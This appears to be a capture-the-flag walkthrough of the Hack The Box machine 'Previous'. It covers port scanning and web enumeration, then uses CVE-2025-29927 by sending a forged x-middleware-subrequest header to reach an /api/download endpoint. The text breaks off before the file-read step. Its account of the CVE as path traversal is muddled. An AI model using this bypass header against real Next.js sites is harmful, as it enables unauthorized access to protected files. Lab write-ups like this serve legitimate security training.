Hack The Box - HTB Previous Writeup - Medium - Weekly - August 23th, 2025
π― Hack The Box: Previous - Complete Walkthrough & Technical Analysis
π Machine Overview
| Property | Value |
|---|---|
| Machine Name | Previous |
| IP Address | [MACHINE_IP] |
| Operating System | Linux (Ubuntu) |
| Difficulty | Medium |
| Points | 30 |
| Release Date | August 23, 2025 |
| Domain | previous.htb |
π Initial Reconnaissance
Port Scanning with Nmap
The first step in any penetration test is reconnaissance. We begin by scanning the target to identify open ports and services.
nmap -sC -sV -oN nmap_initial.txt [MACHINE_IP]
Key Findings:
- Port 22 (SSH): OpenSSH 8.9p1 Ubuntu - Standard SSH service for remote access
- Port 80 (HTTP): nginx 1.18.0 - Web server with automatic redirect to
http://previous.htb/
DNS Configuration
Before proceeding, we need to add the domain to our hosts file:
echo "[MACHINE_IP] previous.htb" | sudo tee -a /etc/hosts
This ensures our system can resolve the domain name properly.
π Web Application Analysis
Technology Stack Identification
Using whatweb to fingerprint the web application:
whatweb http://previous.htb
Critical Discovery: The application is running Next.js (a React framework) powered by Node.js. This is crucial because Next.js applications have specific vulnerabilities and attack vectors.
HTTP Header Analysis
curl -I http://previous.htb/
Response Headers Reveal:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
X-Powered-By: Next.js
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware...
The X-Middleware-Subrequest header is particularly interesting - it suggests the application uses middleware layers that might be exploitable.
Directory Enumeration
feroxbuster -u http://previous.htb/ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-x php,html,js,json,txt,log \
-t 50 -e
Important Finding: Email address discovered - jeremy@previous.htb (potential username for later)
We check the website headers β
Since itβs Next.js, it might be vulnerable to CVE-2025-29927 (PoC exists) depending on the version/config.
π₯ Vulnerability Discovery: CVE-2025-29927
Understanding the Vulnerability
CVE-2025-29927 is a path traversal vulnerability in Next.js applications that allows attackers to read arbitrary files from the server when certain conditions are met:
- The application has an API endpoint that accepts file parameters
- The middleware doesn't properly sanitize user input
- The
X-Middleware-Subrequestheader can be manipulated
Why This Works
Next.js middleware is designed to process requests before they reach the actual API endpoints. By manipulating the middleware chain through the X-Middleware-Subrequest header, we can bypass security controls.
π Exploitation Phase 1: Information Gathering
Step 1: Discovering the Vulnerable Endpoint
We need to find API endpoints. The /api/ directory is standard in Next.js applications:
dirsearch -u http://previous.htb/api/ \
-w /usr/share/wordlists/dirb/common.txt \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
Result: Found /api/download endpoint
Step 2: Reading Environment Variables
Environment variables often contain sensitive information like API keys, database credentials, or configuration details: